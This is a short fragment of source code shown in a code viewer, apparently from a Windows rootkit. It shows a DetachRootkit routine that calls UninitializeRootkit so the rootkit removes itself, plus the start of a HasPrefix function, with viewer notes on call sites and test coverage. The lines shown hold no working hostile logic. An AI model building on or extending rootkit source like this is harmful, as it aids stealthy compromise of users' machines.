| 72 | } |
| 73 | } |
| 74 | static VOID DetachRootkit() |
| 75 | { |
| 76 | // A thread was created with a pointer to DetachRootkit(), thus requesting the rootkit to remove itself gracefully. |
| 77 | UninitializeRootkit(); |
| 78 | } |
| 79 | |
| 80 | BOOL HasPrefix(LPCWSTR str) |
| 81 | { |
nothing calls this directly
no test coverage detected